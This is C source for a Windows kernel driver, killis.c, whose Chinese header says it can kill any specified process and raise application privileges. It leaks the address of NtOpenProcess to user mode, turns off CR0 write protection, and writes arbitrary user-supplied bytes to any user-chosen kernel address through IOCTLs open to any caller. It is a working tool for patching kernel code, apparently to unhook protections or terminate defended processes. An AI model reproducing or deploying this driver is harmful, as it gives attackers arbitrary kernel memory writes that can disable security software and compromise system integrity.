killis.c

使用驱动技术可以关闭任意指定进程提升应用程序权限

#include "ntddk.h"
#include "stdio.h"

#define	NT_DEVICE_NAME   		L"\\Device\\KILLIS"
#define	DOS_DEVICE_NAME         L"\\DosDevices\\KILLIS"
#define	IOCTL_GETADDR_CONTROL 	CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTCODE_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x905,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x910,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTBYTECOUNT_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x915,METHOD_BUFFERED,FILE_ANY_ACCESS)

#define DWORD unsigned long
#define WORD unsigned short
#define BOOL unsigned long

UNICODE_STRING 				DeviceNameString;
UNICODE_STRING 				LinkDeviceNameString;

DWORD GetFunctionAddr(IN PCWSTR FunctionName)
{
    UNICODE_STRING UniCodeFunctionName;
    RtlInitUnicodeString( &UniCodeFunctionName, FunctionName );
    return (DWORD)MmGetSystemRoutineAddress( &UniCodeFunctionName );
}

NTSTATUS DispatchDeviceControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
			ULONG	OutNtAddr;
			KIRQL	oldIrql;
		  NTSTATUS	nStatus 		= STATUS_SUCCESS;
			 ULONG	IoControlCode 	= 0;
PIO_STACK_LOCATION	IrpStack 		= NULL;		
			PUCHAR	inBufByte		= NULL;
			UCHAR	outBuf[20];
	static	PUCHAR	pCode;
	static	ULONG	KrnlAddr		= 0;
	static	ULONG	KrnlByteCount	= 0;
			ULONG 	i;	//Debug

	Irp->IoStatus.Status			= STATUS_SUCCESS;
	Irp->IoStatus.Information		= 0;
	IrpStack	=	IoGetCurrentIrpStackLocation(Irp);

	switch(IrpStack->MajorFunction)
	{
		case IRP_MJ_CREATE:
			DbgPrint("IRP_MJ_CREATE 被调用\n");break;
		case IRP_MJ_CLOSE :
			DbgPrint("IRP_MJ_CLOSE 被调用\n");break;
		case IRP_MJ_DEVICE_CONTROL:
			DbgPrint("IRP_MJ_DEVICE_CONTROL 被调用\n");
		IoControlCode = IrpStack->Parameters.DeviceIoControl.IoControlCode;
			
		switch(IoControlCode)
		{
			case IOCTL_GETADDR_CONTROL:
			DbgPrint("IOCTL_GETADDR_CONTROL 被调用，通讯成功!\n");
			//获取NtOpenProcess的地址并输出(字符串形式)
			OutNtAddr = (DWORD)GetFunctionAddr(L"NtOpenProcess");
			sprintf(outBuf,"%ld",OutNtAddr);
			strcpy(Irp->UserBuffer,outBuf);
			break;

			case IOCTL_INPUTADDR_CONTROL:
			DbgPrint("IOCTL_INPUTADDR_CONTROL");
			KrnlAddr = *((PULONG)Irp->AssociatedIrp.SystemBuffer);	//接受外部输入的BeginAddr数据
			break;
			
			case IOCTL_INPUTBYTECOUNT_CONTROL:
			DbgPrint("IOCTL_INPUTBYTECOUNT_CONTROL");
			KrnlByteCount = *((PULONG)Irp->AssociatedIrp.SystemBuffer);	//接受外部输入的ByteCount数据
			break;
			
			case IOCTL_INPUTCODE_CONTROL:
			DbgPrint("IOCTL_INPUTCODE_CONTROL");
			inBufByte  = (PUCHAR)Irp->AssociatedIrp.SystemBuffer;	//接受外部输入的Byte数据,并且修改高位内存
			pCode	   = inBufByte;
				
			__try
			{		
				_asm
				{
					PUSH   EAX
					CLI                    //dissable interrupt
					MOV    EAX, CR0        //move CR0 register into EAX
					AND	   EAX, NOT 10000H //disable WP bit 
					MOV    CR0, EAX        //write register back
					POP	   EAX
				}			
				
				oldIrql = KeRaiseIrqlToDpcLevel();
				
				RtlCopyMemory(	 (PUCHAR)(KrnlAddr),pCode,sizeof(UCHAR)*KrnlByteCount );	
				
				KeLowerIrql(oldIrql);
				
				_asm
				{
					PUSH   EAX				
					MOV    EAX, CR0        //move CR0 register into EAX
					OR     EAX, 10000H     //enable WP bit     
					MOV    CR0, EAX        //write register back        
					STI                    //enable interrupt
					POP	   EAX					
				}			
			}	
			__except(EXCEPTION_EXECUTE_HANDLER)	
			{
				break;
			}			
			break;			
			
			default:
			break;		
		}
			break;
			default:	DbgPrint("未知请求包调用");
						break;
	}		
	nStatus = Irp->IoStatus.Status;
	IoCompleteRequest(Irp,IO_NO_INCREMENT);
	return nStatus;
}

VOID UnloadDriver(IN PDRIVER_OBJECT DriverObject)
{
	PDEVICE_OBJECT deviceObject;	
	//卸载设备
	DbgPrint("Unload Driver Successfully.............");
    deviceObject= DriverObject->DeviceObject;
    IoDeleteSymbolicLink(&LinkDeviceNameString);
    ASSERT(!deviceObject->AttachedDevice);
    if ( deviceObject != NULL )
    {
        IoDeleteDevice( deviceObject );
    }
}

NTSTATUS DriverEntry(PDRIVER_OBJECT theDriverObject,PUNICODE_STRING RegistryPath)
{
	NTSTATUS 			status;
	PDEVICE_OBJECT   	deviceObject;
	
	//初始化字符串一建立连接
    RtlInitUnicodeString( &DeviceNameString,    NT_DEVICE_NAME );
    RtlInitUnicodeString( &LinkDeviceNameString,DOS_DEVICE_NAME );
	
    status = IoCreateDevice(
				theDriverObject,
				0,                      
				&DeviceNameString,
				FILE_DEVICE_DISK_FILE_SYSTEM,
				FILE_DEVICE_SECURE_OPEN,
				FALSE,
				& deviceObject );
				
	if ( !NT_SUCCESS(status) ) 
    {
        DbgPrint("DriverEntry: Error creating control device object, status=%08x\n", status);
        return status;
    }
    
    status = IoCreateSymbolicLink(
				(PUNICODE_STRING) &LinkDeviceNameString,
                (PUNICODE_STRING) &DeviceNameString
								 ); 
	if ( !NT_SUCCESS(status) )
	{
		IoDeleteDevice(deviceObject);
		return status;
	}
	
	//建立通信
    theDriverObject->MajorFunction[IRP_MJ_CREATE] = DispatchDeviceControl;
	theDriverObject->MajorFunction[IRP_MJ_CLOSE]  = DispatchDeviceControl;
	theDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DispatchDeviceControl; 	
	theDriverObject->DriverUnload = UnloadDriver;	//设置卸载指针
	return STATUS_SUCCESS;
}